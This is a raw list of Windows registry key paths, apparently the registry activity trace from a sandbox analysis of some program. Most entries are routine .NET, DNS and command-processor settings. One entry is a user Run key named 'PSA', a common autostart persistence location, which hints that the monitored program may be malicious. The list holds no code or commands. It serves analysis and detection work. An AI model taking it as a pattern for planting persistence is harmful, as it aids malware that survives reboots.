HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Windows.Forms,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Drawing,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Xml,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Configuration,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Deployment,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Runtime.Serialization.Formatters.Soap,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Accessibility,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Security,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy\Enabled
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Microsoft.VisualBasic,8.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Web,2.0.0.0,,b03f5f7f11d50a3a,x86
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Management,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Runtime.Remoting,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DisableUNCCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\EnableExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DelayedExpansion
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DefaultColor
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\CompletionChar
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\PathCompletionChar
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\AutoRun
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DisableUNCCheck
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\EnableExtensions
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DelayedExpansion
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DefaultColor
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\CompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\PathCompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it-IT
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it-IT
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000410
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\PSA
HKEY_CURRENT_USER\Control Panel\International\sYearMonth
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DbgJITDebugLaunchSetting
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DbgManagedDebugger
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\AppCompat\RaiseDefaultAuthnLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\DefaultAccessPermission
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\NdrOleExtDLL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\RemoteRpcDll
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\1A460378
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\MachineThrottling
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\GlobalSession
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\MaximumAllowedAllocationSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Data.SqlXml,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\InstallationType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\PSAA1_RASAPI32\EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\PSAA1_RASAPI32\FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\PSAA1_RASAPI32\EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\PSAA1_RASAPI32\ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\PSAA1_RASAPI32\MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\PSAA1_RASAPI32\FileDirectory
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\.NET CLR Networking\Performance\Library
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\.NET CLR Networking\Performance\IsMultiInstance
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\.NET CLR Networking\Performance\First Counter
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\.NET CLR Networking\Performance\CategoryOptions
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\.NET CLR Networking\Performance\FileMappingSize
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\.NET CLR Networking\Performance\Counter Names
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\QueryAdapterName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\QueryAdapterName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\DisableAdapterDomainName
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\UseDomainNameDevolution
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\UseDomainNameDevolution
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\UseDomainNameDevolution
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\DomainNameDevolutionLevel
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\DomainNameDevolutionLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\PrioritizeRecordData
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\PrioritizeRecordData
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\PrioritizeRecordData
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\AllowUnqualifiedQuery
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\AllowUnqualifiedQuery
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\AllowUnqualifiedQuery
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\AppendToMultiLabelName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\AppendToMultiLabelName
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\ScreenBadTlds
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\ScreenBadTlds
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\ScreenUnreachableServers
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\ScreenUnreachableServers
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\ScreenDefaultServers
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\ScreenDefaultServers
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\DynamicServerQueryOrder
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\DynamicServerQueryOrder
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\FilterClusterIp
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\FilterClusterIp
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\WaitForNameErrorOnAll
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\WaitForNameErrorOnAll
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\UseEdns
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\UseEdns
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\DnsSecureNameQueryFallback
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\DnsSecureNameQueryFallback
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\EnableDAForAllNetworks
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\EnableDAForAllNetworks
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\DirectAccessQueryOrder
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\DirectAccessQueryOrder
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\QueryIpMatching
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\QueryIpMatching
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\UseHostsFile
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\UseHostsFile
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\AddrConfigControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\AddrConfigControl
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\RegistrationEnabled
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\RegistrationEnabled
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\DisableDynamicUpdate
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\RegisterPrimaryName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\RegisterPrimaryName
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\RegisterAdapterName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\RegisterAdapterName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\EnableAdapterDomainNameRegistration
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\RegisterReverseLookup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\RegisterReverseLookup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\DisableReverseAddressRegistrations
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\RegisterWanAdapters
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\RegisterWanAdapters
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\DisableWanDynamicUpdate
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\RegistrationTtl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\RegistrationTtl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\DefaultRegistrationTTL
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\RegistrationRefreshInterval
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\RegistrationRefreshInterval
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\DefaultRegistrationRefreshInterval
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\RegistrationMaxAddressCount
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\RegistrationMaxAddressCount
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\MaxNumberOfAddressesToRegister
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\UpdateSecurityLevel
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\UpdateSecurityLevel
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\UpdateSecurityLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\UpdateTopLevelDomainZones
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\UpdateTopLevelDomainZones
